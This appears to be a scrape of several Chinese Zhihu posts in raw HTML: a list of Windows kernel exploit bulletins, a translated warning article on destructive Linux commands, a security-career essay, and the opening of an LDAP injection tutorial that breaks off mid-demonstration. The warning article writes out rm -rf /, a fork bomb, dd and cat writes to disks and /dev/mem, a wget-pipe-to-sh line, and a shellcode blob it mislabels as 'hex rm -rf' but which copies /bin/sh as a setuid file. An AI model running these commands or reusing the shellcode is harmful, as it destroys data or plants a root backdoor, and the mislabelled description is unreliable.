(/8/2012)&/p&&p&MS15-051  [KB3057191]  [Windows Kernel Mode Drivers]  (/8/2012)&/p&&p&MS15-010  [KB3036220]  [Kernel Driver]  (/8)&/p&&p&MS15-015  [KB3031432]  [Kernel Driver]  (Win7/8/8.1/2012/RT/8 R2)&/p&&p&MS15-001  [KB3023266]  [Kernel Driver]  (/8)&/p&&p&MS14-070  [KB2989935]  [Kernel Driver]  (2003)&/p&&p&MS14-068  [KB3011780]  [Domain Privilege Escalation]  (12/7/8)&/p&&p&MS14-058  [KB3000061]  [Win32k.sys]  (12/7/8)&/p&&p&MS14-040  [KB2975684]  [AFD Driver]  (12/7/8)&/p&&p&MS14-002  [KB2914368]  [NDProxy]  (2003/XP)&/p&&p&MS13-053  [KB2850851]  [win32k.sys]  (XP/Vista//win 7)&/p&&p&MS13-046  [KB2840221]  [dxgkrnl.sys]  (Vista/12/7)&/p&&p&MS13-005  [KB2778930]  [Kernel Mode Driver]  (12/win7/8)&/p&&p&MS12-042  [KB2972621]  [Service Bus]  (/win7)&/p&&p&MS12-020  [KB2671387]  [RDP]  (/XP)&/p&&p&MS11-080  [KB2592799]  [AFD.sys]  (2003/XP)&/p&&p&MS11-062  [KB2566454]  [NDISTAPI]  (2003/XP)&/p&&p&MS11-046  [KB2503665]  [AFD.sys]  (/XP)&/p&&p&MS11-011  [KB2393802]  [kernel Driver]  (/XP/Vista)&/p&&p&MS10-092  [KB2305420]  [Task Scheduler]  (2008/7)&/p&&p&MS10-065  [KB2267960]  [FastCGI]  (IIS 5.1, 6.0, 7.0, and 7.5)&/p&&p&MS10-059  [KB982799]   [ACL-Churraskito]  (2008/7/Vista)&/p&&p&MS10-048  [KB2160329]  [win32k.sys]  (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)&/p&&p&MS10-015  [KB977165]   [KiTrap0D]  (/XP)&/p&&p&MS09-050  [KB975517]   [Remote Code Execution]  (2008/Vista)&/p&&p&MS09-020  [KB970483]   [IIS 6.0]  (IIS 5.1 and 6.0)&/p&&p&MS09-012  [KB959454]   [Chimichurri]  (Vista/win7/2008/Vista)&/p&&p&MS08-068  [KB957097]   [Remote Code Execution]  (2000/XP)&/p&&p&MS08-067  [KB958644]   [Remote Code Execution]  (Windows 2000/XP/Server 2003/Vista/Server 2008)&/p&&p&MS08-025  [KB941693]   [Win32.sys]  (XP//Vista)&/p&&p&MS06-040  [KB921883]   [Remote Code Execution]  (2003/xp/2000)&/p&&p&MS05-039  [KB899588]   [PnP Service]  (Win 9X/ME/NT/2000/XP/2003)&/p&&p&MS03-026  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)&/p&&p&&br&&/p&&p&项目下载地址;&a href=&http://link.zhihu.com/?target=https%3A//github.com/SecWiki/windows-kernel-exploits& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&github.com/SecWiki/wind&/span&&span class=&invisible&&ows-kernel-exploits&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&&br&&/p&&p&文章内容50%来源于&/p&&p&&a href=&http://link.zhihu.com/?target=https%3A//www.sploitspren.com/-Windows-Privilege-Escalation-Guide/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://www.&/span&&span class=&visible&&sploitspren.com/2018-01&/span&&span class=&invisible&&-26-Windows-Privilege-Escalation-Guide/&/span&&span class=&ellipsis&&&/span&&/a&&/p&
怪狗提示,值得收藏与分享! 介绍 windows提权总是被归结为适当的枚举。但要完成适当的枚举,你需要知道要检查和查找的内容。这通常需要伴随着经验的丰富而对系统非常熟悉。起初特权升级看起来像是一项艰巨的任务,但过了一段时间,你就开始过滤哪些是正常…
&figure&&img src=&https://pic3.zhimg.com/v2-57bf78859d0dec0995a6efc99425beeb_b.jpg& data-rawwidth=&1043& data-rawheight=&496& class=&origin_image zh-lightbox-thumb& width=&1043& data-original=&https://pic3.zhimg.com/v2-57bf78859d0dec0995a6efc99425beeb_r.jpg&&&/figure&&p&&b&当然,除非你想干掉你的机器。&/b&&/p&&p&蜘蛛侠有这样的一句信条,“权力越大,责任越大。” 对于 Linux 系统管理员们来说,这也是一种应当采用的明智态度。&/p&&p&不,真的,真心感谢 DevOps 的沟通协作和云编排技术,让一个 Linux 管理员不仅能掌控一台服务器,甚者能控制成千上万台服务器实例。只需要一个愚蠢的举动,你甚至可以毁掉一个价值数十亿美元的企业,就像 &a href=&https://link.zhihu.com/?target=http%3A//www.zdnet.com/article/equifax-blames-open-source-software-for-its-record-breaking-security-breach/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&没有打补丁的 Apache Struts&/a& 一样。&/p&&p&如果不能跑在安全补丁之前,这将会带来一个远超过系统管理员工资水平的战略性业务问题。这里就有一些足以搞死 Linux 服务器的简单方式掌握在系统管理员手中。很容易想象到,只有新手才会犯这些错误,但是,我们需要了解的更多。&/p&&p&下列是一些著名的命令,任何拥有 root 权限的用户都能借助它们对服务器造成严重破坏。&/p&&p&&b&警告:千万不要在生产环境运行这些命令,它们会危害你的系统。不要在家里尝试,也不要在办公室里测试。&/b&&/p&&p&那么,继续!&/p&&h2&&b&rm -rf /&/b&&/h2&&p&想要干脆利落的毁掉一个 Linux 系统吗?你无法超越这个被誉为“史上最糟糕”的经典,它能删除一切,我说的是,能删除所有存在你系统里的内容!&/p&&p&和大多数 &a href=&https://link.zhihu.com/?target=https%3A//www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Linux 命令&/a&一样,&code&rm&/code& 这个核心命令使用起来非常方便。即便是最顽固的文件它也能帮你删除。结合起后面两个参数理解 &code&rm&/code& 指令时,你很容易陷入大麻烦:&code&-r&/code&,强制递归删除所有子目录,&code&-f&/code&,无需确认,强制删除所有只读文件。如果你在根目录运行这条指令,将清除整个驱动器上的所有数据。&/p&&p&如果你真这么干了,想想该怎么和老板解释吧!&/p&&p&现在,也许你会想,“我永远不会犯这么愚蠢的错误。”朋友,骄兵必败。吸取一下经验教训吧, &a href=&https://link.zhihu.com/?target=https%3A//www.reddit.com/r/sysadmin/comments/732skq/after_21_years_i_finally_made_the_rm_boo_boo/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&这个警示故事来自于一个系统管理员在 Reddit 上的帖子&/a&:&/p&&blockquote&我在 IT 界工作了很多年,但是今天,作为 Linux 系统 root 用户,我在错误的系统路径运行了 &code&rm- f&/code&&br&长话短说,那天,我需要复制一大堆目录从一个目录到另一个目录,和你一样,我敲了几个 &code&cp -R&/code& 去复制我需要的内容。&br&以我的聪明劲,我持续敲着上箭头,在命令记录中寻找可以复制使用的类似命令名,但是它们混杂在一大堆其他命令当中。&br&不管怎么说,我一边在 Skype、Slack 和 WhatsApp 的网页上打字,一边又和 Sage 通电话,注意力严重分散,我在敲入 &code&rm -R ./videodir/* ../companyvideodirwith651vidsin/&/code& 这样一条命令时神游物外。&/blockquote&&p&然后,当文件化为乌有时其中也包括了公司的视频。幸运的是,在疯狂敲击 &code&control -C&/code& 后,在删除太多文件之前,系统管理员中止了这条命令。但这是对你的警告:任何人都可能犯这样的错误。&/p&&p&事实上,绝大部分现代操作系统都会在你犯这些错误之前,用一段醒目的文字警告你。然而,如果你在连续敲击键盘时忙碌或是分心,你将会把你的系统键入一个黑洞。(LCTT 译注:幸运的是,可能在根目录下删除整个文件系统的人太多了额,后来 &code&rm&/code& 默认禁止删除根目录,除非——你手动加上 &code&--no-preserve-root&/code& 参数!)&/p&&p&这里有一些更为隐蔽的方式调用 &code&rm -rf&/code&。思考一下下面的代码:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&char esp[] __attribute__ ((section(“.text”))) =
“\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/. chmod 4755
&/code&&/pre&&/div&&p&这是什么?这是 16 进制的 &code&rm -rf&/code& 写法。在你不明确这段代码之前,请千万不要运行这条命令!&/p&&h2&&b&fork 炸弹&/b&&/h2&&p&既然我们讨论的都是些奇怪的代码,不妨思考一下这一行:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&:(){ :|: & };:
&/code&&/pre&&/div&&p&对你来说,这可能看起来有些神秘,但是我看来,它就是那个臭名昭著的 &a href=&https://link.zhihu.com/?target=https%3A//linux.cn/article-5685-1.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Bash fork 炸弹&/a&。它会反复启动新的 Bash shell,直到你的系统资源消耗殆尽、系统崩溃。&/p&&p&不应该在最新的 Linux 系统上做这些操作。注意,我说的是&b&不应该&/b&。我没有说&b&不能&/b&。正确设置用户权限,Linux 系统能够阻止这些破坏性行为。通常用户仅限于分配使用机器可用内存。但是如果作为 root 用户的你运行了这行命令(或者它的变体 &a href=&https://link.zhihu.com/?target=https%3A//unix.stackexchange.com/questions/283496/why-do-these-bash-fork-bombs-work-differently-and-what-is-the-significance-of& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Bash fork 炸弹变体&/a&),你仍然可以反复虐待服务器,直到系统重启了。&/p&&h2&&b&垃圾数据重写硬盘&/b&&/h2&&p&有时候你想彻底清除硬盘的数据,你应该使用 &a href=&https://link.zhihu.com/?target=https%3A//dban.org/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Darik's Boot and Nuke (DBAN)&/a& 工具去完成这项工作。&/p&&p&但是如果仅仅想让你的存储器乱套,那很简单:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&任意命令 & /dev/hda
&/code&&/pre&&/div&&p&我说的“任意命令”,是指有输出的任意命令,比如:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&ls -la & /dev/hda
&/code&&/pre&&/div&&p&……将目录列表通过管道送到你的主存储设备。给我 root 权限和足够的时间,就能覆盖整个硬盘设备。这是让你开始盲目恐慌的一天的好办法,或者,可以把它变成 &a href=&https://link.zhihu.com/?target=https%3A//www.hpe.com/us/en/insights/articles/13-ways-to-tank-your-it-career-1707.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&职业禁入方式&/a&。&/p&&h2&&b&擦除硬盘!&/b&&/h2&&p&另一个一直受欢迎的擦除硬盘的方式是执行:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&dd if=/dev/zero of=/dev/hda
&/code&&/pre&&/div&&p&你可以用这条命令写入数据到你的硬盘设备。&code&dd&/code& 命令可以从特殊文件中获取无尽个 &code&0&/code& 字符,并且将它全部写入你的设备。&/p&&p&可能现在听起来 &code&/dev/zero&/code& 是个愚蠢的想法,但是它真的管用。比如说,你可以使用它来 &a href=&https://link.zhihu.com/?target=https%3A//unix.stackexchange.com/questions/44234/clear-unused-space-with-zeros-ext3-ext4& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&用零清除未使用的分区空间&/a&。它能使分区的镜像压缩到更小,以便于数据传输或是存档使用。&/p&&p&在另一方面,它和 &code&dd if=/dev/random of=/dev/hda&/code& 相近,除了能毁掉你的一天之外,不是一个好事。如果你运行了这个指令(千万不要),你的存储器会被随机数据覆盖。作为一个隐藏你要接管办公室咖啡机的秘密计划的半吊子方法,倒是不错,但是你可以使用 DBAN 工具去更好的完成你的任务。&/p&&h2&&b&/dev/null 的损失&/b&&/h2&&p&也许因为数据珍贵,我们对备份的数据没有什么信心,确实很多“永远不要这样做!”的命令都会导致硬盘或其它存储仓库的数据被擦除。一个鲜明的实例:另一个毁灭你的存储设备的方式,运行 &code&mv / /dev/null&/code& 或者 &code&&mv /dev/null&/code&。&/p&&p&在前一种情况下,你作为 root 用户,把整个磁盘数据都送进这个如饥似渴的 &code&/dev/null&/code&。在后者,你仅仅把家目录喂给这个空空如也的仓库。任何一种情况下,除非还原备份,你再也不会再看见你的数据了。&/p&&p&见鬼,难道会计真的不需要最新的应收账款文件了吗?&/p&&h2&&b&格式化错了驱动器&/b&&/h2&&p&有时候你需要使用这一条命令格式化驱动器:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&mkfs.ext3 /dev/hda
&/code&&/pre&&/div&&p&……它会用 ext3 文件系统格式化主硬盘驱动器。别,请等一下!你正在格式化你的主驱动器!难道你不需要用它?&/p&&p&当你要格式化驱动器的时候,请务必加倍确认你正在格式化的分区是真的需要格式化的那块而不是你正在使用的那块,无论它们是 SSD、闪存盘还是其他氧化铁磁盘。&/p&&h2&&b&内核崩溃&/b&&/h2&&p&一些 Linux 命令不能让你的机器长时间停机。然而,一些命令却可以导致内核崩溃。这些错误通常是由硬件问题引起的,但你也可以自己搞崩。&/p&&p&当你遭遇内核崩溃,重新启动系统你才可以恢复工作。在一些情况下,这只是有点小烦;在另一些情况下,这是一个大问题,比如说,高负荷运作下的生产环境。下面有一个案例:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&dd if=/dev/random of=/dev/port
echo 1 & /proc/sys/kernel/panic
cat /dev/port
cat /dev/zero & /dev/mem
&/code&&/pre&&/div&&p&这些都会导致内核崩溃。&/p&&p&绝不要运行你并不了解它功能的命令,它们都在提醒我…&/p&&h2&&b&提防未知脚本&/b&&/h2&&p&年轻或是懒惰的系统管理员喜欢复制别人的脚本。何必重新重复造轮子?所以,他们找到了一个很酷的脚本,承诺会自动检查所有备份。他们就这样运行它:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
&/code&&/pre&&/div&&p&这会下载该脚本,并将它送到 shell 上运行。很明确,别大惊小怪,对吧?不对。这个脚本也许已经被恶意软件感染。当然,一般来说 Linux 比大多数操作系统都要安全,但是如果你以 root 用户运行未知代码,什么都可能会发生。这种危害不仅在恶意软件上,脚本作者的愚蠢本身同样有害。你甚至可能会因为一个未调试的代码吃上一堑——由于你没有花时间去读它。&/p&&p&你认为你不会干那样的事?告诉我,所有那些 &a href=&https://link.zhihu.com/?target=https%3A//www.oreilly.com/ideas/five-security-concerns-when-using-docker& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&你在 Docker 里面运行的容器镜像在干什么&/a&?你知道它们到底在运行着什么吗?我见过太多的没有验证容器里面装着什么就运行它们的系统管理员。请不要和他们一样。&/p&&h2&&b&结束&/b&&/h2&&p&这些故事背后的道理很简单。在你的 Linux 系统里,你有巨大的控制权。你几乎可以让你的服务器做任何事。但是在你使用你的权限的同时,请务必做认真的确认。如果你没有,你毁灭的不只是你的服务器,而是你的工作甚至是你的公司。像蜘蛛侠一样,负责任的使用你的权限。&/p&&p&我有没有遗漏什么?在 &a href=&https://link.zhihu.com/?target=http%3A//www.twitter.com/sjvn& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&@sjvn&/a& 或 &a href=&https://link.zhihu.com/?target=http%3A//www.twitter.com/enterprisenxt& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&@enterprisenxt&/a& 上告诉我哪些 Linux 命令在你的“&a href=&https://link.zhihu.com/?target=https%3A//www.youtube.com/watch%3Fv%3Dv79fYnuVzdI& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&绝不要运行!&/a&”的清单上。&/p&&hr&&p&via: &a href=&https://link.zhihu.com/?target=https%3A//www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://www.&/span&&span class=&visible&&hpe.com/us/en/insights/&/span&&span class=&invisible&&articles/the-linux-commands-you-should-never-use-1712.html&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&作者:&a href=&https://link.zhihu.com/?target=https%3A//www.hpe.com/us/en/insights/contributors/steven-j-vaughan-nichols.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Steven Vaughan-Nichols&/a& 译者:&a href=&https://link.zhihu.com/?target=https%3A//github.com/CYLeft& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&CYLeft&/a& 校对:&a href=&https://link.zhihu.com/?target=https%3A//github.com/wxy& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&wxy&/a&&/p&&p&本文由 &a href=&https://link.zhihu.com/?target=https%3A//github.com/LCTT/TranslateProject& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&LCTT&/a& 原创编译,&a href=&https://link.zhihu.com/?target=https%3A//linux.cn/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Linux中国&/a& 荣誉推出&/p&
当然,除非你想干掉你的机器。蜘蛛侠有这样的一句信条,“权力越大,责任越大。” 对于 Linux 系统管理员们来说,这也是一种应当采用的明智态度。不,真的,真心感谢 DevOps 的沟通协作和云编排技术,让一个 Linux 管理员不仅能掌控一台服务器,甚者能控制…
&figure&&img src=&https://pic1.zhimg.com/v2-a0bc4280d84edaa19d14fa_b.jpg& data-rawwidth=&606& data-rawheight=&1004& class=&origin_image zh-lightbox-thumb& width=&606& data-original=&https://pic1.zhimg.com/v2-a0bc4280d84edaa19d14fa_r.jpg&&&/figure&&p&自己在乙方算上之初已经工作了3年左右,现在想想是时间写出一些东西分享给大家了。此文仅代表个人的观点,欢迎大家讨论。由于自己没在乙方的RD体系内待过,所以可能更多是站在实施人员的角度看待问题。在工作的三年来,我一直在思考乙方的本质是什么,以及乙方的安全从业人员如何规划自己的职业,现在我给出一些自己的见解,希望能够帮助到大家。&/p&&ul&&li&&b&什么是乙方?网络安全乙方的核心本质是什么?&/b&&/li&&/ul&&p&首先回到最初始的概念,什么叫乙方。乙方即项目的实施方,要交付产品或者服务结果给甲方。那么安全行业乙方应该做些什么。核心一点是产品化,这是我这3年工作以来最深刻的理解,乙方不论是服务还是产品都要抽象成一个有标准化流程的产品。然后去销售这个产品,举个通俗点的例子,拿大家最感兴趣的安全服务说起:&/p&&ol&&li&抽象一个概念:&/li&&/ol&&figure&&img src=&https://pic1.zhimg.com/v2-5f9a5bbde95eec71c44509b8_b.jpg& data-size=&normal& data-rawwidth=&1238& data-rawheight=&814& class=&origin_image zh-lightbox-thumb& width=&1238& data-original=&https://pic1.zhimg.com/v2-5f9a5bbde95eec71c44509b8_r.jpg&&&figcaption&大体抽象一下安全服务的概念&/figcaption&&/figure&&p&我们大体抽象了一下安全服务的概念,这是我们在乙方产品化的第一步,一般我们会乙方会选取1-2个点进行切入。下面我们以渗透测试来举例。&/p&&p&2.细化自己的产品能力:&/p&&figure&&img src=&https://pic1.zhimg.com/v2-ddf174552aaebc43c1a19be57ed07430_b.jpg& data-size=&normal& data-rawwidth=&1100& data-rawheight=&694& class=&origin_image zh-lightbox-thumb& width=&1100& data-original=&https://pic1.zhimg.com/v2-ddf174552aaebc43c1a19be57ed07430_r.jpg&&&figcaption&针对单点确定自己的产品能力&/figcaption&&/figure&&p&这四个并不是并列关系,可能是一种递进的关系,这一步至关重要。因为在后续方案的白皮书以及售前PPT的制作中,我们要给客户讲清楚我们到底卖的是什么,我们具备怎样的能力。这样才能让客户觉得你卖的是一款靠谱的产品。&/p&&p&3.让产品可以卖&/p&&p&这块我自己不太擅长,因为一直是做的技术工作,大体说一下。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-fcd21bde44df38cb06bbb053a7043bbb_b.jpg& data-size=&normal& data-rawwidth=&1302& data-rawheight=&830& class=&origin_image zh-lightbox-thumb& width=&1302& data-original=&https://pic4.zhimg.com/v2-fcd21bde44df38cb06bbb053a7043bbb_r.jpg&&&figcaption&做一款让销售可以卖的产品&/figcaption&&/figure&&p&我们技术人员光光具备技术能力是不够的,我们需要把产品变成钱,这个时候我们就需要构建起产品、技术和销售之间的桥梁。由于自己一直在技术岗位,这块问题看得比较狭隘,只能做为抛砖引玉。&/p&&p&说了这么多,乙方的本质是卖产品,把产品变成钱(说了这么多,感觉就想说这么一句)。&/p&&ul&&li&&b&乙方安全服务从业人员的分布&/b&&/li&&/ul&&p&通过集成商、启明星辰、知道创宇的经历,感觉乙方安全服务人员主要分为这几个方面:&/p&&figure&&img src=&https://pic2.zhimg.com/v2-d4167adee_b.jpg& data-size=&normal& data-rawwidth=&1758& data-rawheight=&790& class=&origin_image zh-lightbox-thumb& width=&1758& data-original=&https://pic2.zhimg.com/v2-d4167adee_r.jpg&&&figcaption&安全服务人员最主要的分布&/figcaption&&/figure&&p&一些培训等岗位并未包含在内,因为其中的部分岗位不论校招和社招都比较难招到合适的人才,所以以上方向都可能以安全服务工程师的字眼出现。所以一定要看好岗位JD以及面试一定问清楚确保自己想找的与自己的职业规划一致。&/p&&ul&&li&&b&在乙方从事安全的优点和缺点(本文重点)&/b&&/li&&li&&b&优点:&/b&&/li&&li&多角度多行业的视角积累,能够快速对比掌握各行业的安全态势和需求:&/li&&/ul&&p&乙方一定不会可准一个行业卖到死,肯定希望是多行业开花,再总结出多行业的安全需求。所以在乙方可以快速的了解多个行业的安全态势,对行业做出基本评估。举个例子:&/p&&p&政府行业安全最怕的是篡改与监管部门通报。&/p&&p&传统甲方最迫切的是合规和流程化安全服务需求,涉及金融类的可能对攻防需求更多。&/p&&ul&&li&创业型乙方大多在某一领域特别出众:&/li&&/ul&&p&比如一些从知名互联网出来的大牛,知乎上比较著名的比如云舒大大。可能做的一些产品在BAT或者一线互联网是一个demo或者雏形,毕竟是给自家公司用的,能用即可。而作为乙方需要更为细致的打磨以适应更多更多的行业。对于某一单点技术,诸如渗透测试,诸如移动安全加固等产品可能比大多数甲方甚至互联网甲方要优秀。&/p&&ul&&li&多角度思考问题,学会换位思考:&/li&&/ul&&p&为了卖出和更好的实施产品,我们往往需要多角度思考,从甲方角度分析需求,从乙方角度考虑怎么卖出产品,对综合素质提升快。&/p&&ul&&li&&b&缺点:&/b&&/li&&li&容易缺乏安全落地的能力:&/li&&/ul&&p&大多数乙方以交付项目为主,产品已经完全流程化,工程师和项目主管知流程不知其所以然。比如一个安全咨询项目,可能一个优秀的人员能短时间写出50个体系化的word文档,涉及人力管理等各个方面,但甲方咨询他怎么在企业落地,很多没有甲方从业经验的人难以回答。&/p&&ul&&li&大多数乙方的工作杂而不精(与优点中的第二条并不矛盾,应该大家深有体会):&/li&&/ul&&p&迫于项目成本,很多项目时间卡的非常死。很多工作尤其应届生知其然不知其所以然,没有人告诉他怎么知所以然,因为带他的人也不知所以然,反正照着操作说明或者前人文档照猫画虎就好,职业认同感低,待遇相比甲方偏低。&/p&&ul&&li&容易扯皮,让技术人员无法专注与技术深度而变得非常油腻:&/li&&/ul&&p&项目售前人员由于技术水平原因或者营收压力,往往给出的需求非常不合理。诸如一天渗透测试完50个域名(夸张举例)。解决这种问题的方法,要不糊弄,要么跟项目经理与甲方扯皮,而且不在少数。一个技术人员大量时间用在糊弄项目或者扯皮工作,对于自己自身的技术是无意义的。&/p&&ul&&li&&b&总结:&/b&&/li&&/ul&&p&一句话:乙方有好也有坏,适合自己才是最好的。&/p&&p&&/p&&p&&/p&&p&&/p&
自己在乙方算上之初已经工作了3年左右,现在想想是时间写出一些东西分享给大家了。此文仅代表个人的观点,欢迎大家讨论。由于自己没在乙方的RD体系内待过,所以可能更多是站在实施人员的角度看待问题。在工作的三年来,我一直在思考乙方的本质是什么,以及…
&p&企业通常会部署Active Directory环境来管理域对象,如用户,组织,部门,计算机和打印机,并将此与自定义Web应用程序的增加结合起来,企业组织自然也希望将这两种技术集成在一起。这种集成是为了在域环境中创建最佳的集中式的身份验证方式,同时也提供了查询和管理Active Directory环境的方法。&/p&&p&需要记住的是,集成这两种技术也可能会为恶意攻击者提供另一个攻击面。因此,在与Active Directory集成时,实现良好的Web应用程序安全性至关重要。&/p&&p&在开始使用之前,我们首先了解一下用于将Web应用程序与Active Directory – LDAP(轻量级Active Directory协议)集成的协议。LDAP不仅可以从目录数据库查询对象,还可以用于管理和身份验证。&/p&&p&另外要记住的是LDAP 本身并不是目录数据库。它是一种提供访问目录数据库方法的服务和协议。此外,LDAP也并不是微软Active Directory环境独有的。实际上也有其他几种类型的数据库使用了LDAP,如OpenLDAP。&/p&&p&SQL注入是人们想到Web应用程序开发的时候想到的最典型的攻击方法,但是LDAP集成的网站也可能通过注入攻击被利用。SQL注入和LDAP注入之间存在着明显的差异,因为两者之间的语法差异很大。&/p&&p&为了说明LDAP注入,我搭建了一个集成了LDAP的有漏洞的Web应用程序,并将在下面演示一个简单的注入过程。在演示LDAP注入之前,我们先来介绍一下这两个知识点:&/p&&p&1. 了解目录数据库结构。&/p&&p&2. 了解LDAP语法。&/p&&h2&&b&目录数据库结构&/b&&/h2&&p&根据企业组织的不同,目录数据库可能非常复杂而且非常庞大。因此,我将使用LDIF(LDAP交换格式)文件来说明一个简单的目录结构。LDIF文件只是表示目录数据和LDAP命令的纯文本文件。它们也用于读取,写入和更新目录中的数据。你可以在下面看到一个LDIF模板文件示例。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-cf7d866f3ad036ccd2471_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&987& data-rawheight=&892& class=&origin_image zh-lightbox-thumb& width=&987& data-original=&https://pic2.zhimg.com/v2-cf7d866f3ad036ccd2471_r.jpg&&&/figure&&p&第8-10行:我们定义了顶级域名“ org ”。&/p&&p&第12-15行:我们定义了子域“ yourcompany ”,即“ &a href=&http://link.zhihu.com/?target=http%3A//yourcompany.org& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&yourcompany.org&/span&&span class=&invisible&&&/span&&/a& ”。&/p&&p&第17-37行:我们定义了三个组织单元(ou):财务和销售。&/p&&p&第29+行:我们在域“yourcompany.org”中添加了一个用途,并为属性赋值。例如,“ cn ”表示规范名称(或名字),“ sn ”表示姓氏,“ 邮件 ”表示该员工的电子邮件地址。&/p&&p&注意:&br&根据你使用的环境类型,LDAP属性会有所不同。例如,“userPassword”存在于OpenLDAP中,但不在Active Directory环境中。&/p&&h2&&b&了解基本的LDAP语法&/b&&/h2&&p&LDAP具有非常特定的查询结构,并具有特定的语法。以下是在LDAP查询中使用的常见操作符:&/p&&p&· “=”(等于)&/p&&p&· &(逻辑和)&/p&&p&· | (逻辑或)&/p&&p&· !(逻辑不)&/p&&p&· *(通配符)&/p&&p&例如,如果我们想要在上面的LDAP结构中查询名为“ steve ”的人,我们的查询将如下所示:&/p&&p&(cn=steve)&/p&&p&也许我们想要搜索名称以“ s ” 开头的任何成员,那么我们可以使用通配符:&/p&&p&(cn=s*)&/p&&p&我们还可以使用“ | ”运算符搜索名称以“s”或“t”开头的任何人:&/p&&p&(|(cn=s*)(cn=t*))&/p&&p&我们也可以使用“&”运算符来要求这两个字段都是正确的。例如,如果我们想要搜索名称以“s”开头,姓氏以“d ” 结尾的任何人。&/p&&p&(&(cn=s*)(sn=*d))&/p&&p&最后,我们可以将所有这些操作符合并在一起来执行查询。例如,假设我们想要查找任何名字以“s ” 开头的人,但他们的姓必须以“d”或“r” 开头:&/p&&p&(&(cn=s*)(|(sn=d*) (sn=r*))&/p&&h2&&b&LDAP注入演示&/b&&/h2&&p&现在我们对相关的知识点有了更好的了解,让我们继续进行演示。从下图中可以看到一个叫做 “Your Company LLC”的公司的“员工搜索表单”的网页示例:&/p&&figure&&img src=&https://pic3.zhimg.com/v2-0def695beb10deae_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&921& data-rawheight=&421& class=&origin_image zh-lightbox-thumb& width=&921& data-original=&https://pic3.zhimg.com/v2-0def695beb10deae_r.jpg&&&/figure&&p&我们先简单地输入一些数据并提交。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-cd271bbc7c2f4b2b334beeb_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1143& data-rawheight=&584& class=&origin_image zh-lightbox-thumb& width=&1143& data-original=&https://pic4.zhimg.com/v2-cd271bbc7c2f4b2b334beeb_r.jpg&&&/figure&&p&我们的表单通过获取查询(在上面的url栏中看到)提交值“ s ”和属性“ cn ”(名字)并返回给我们一个表,其中包含了名字以“s”开头的员工。&/p&&p&我们可以查看本网站的网页源码,查看相应的表单字段并获取URL中的参数(见下图)。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-bd6dddcde4a36_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&938& data-rawheight=&613& class=&origin_image zh-lightbox-thumb& width=&938& data-original=&https://pic3.zhimg.com/v2-bd6dddcde4a36_r.jpg&&&/figure&&p&我们可以看到,LDAP属性只允许我们选择某些字段。我们可以在我们的URL中进行更改,也可以在开发人员控制台中直接编辑字段的值。这通常比在开发者控制台中更容易修改。显然,修改URL参数并不适用于POST请求,因此,我通常更愿意在开发人员控制台中编辑这些值。另一种方法是使用像Burpsuite或ZAP这样的代理在发送到服务器之前修改这些值。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-b5cebcae054ad9a48a66b71f_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1107& data-rawheight=&536& class=&origin_image zh-lightbox-thumb& width=&1107& data-original=&https://pic4.zhimg.com/v2-b5cebcae054ad9a48a66b71f_r.jpg&&&/figure&&p&下面你可以看到这个字段从“cn”更改为了“password”。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-fb2c94358d2dff62a2f1cb_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1431& data-rawheight=&713& class=&origin_image 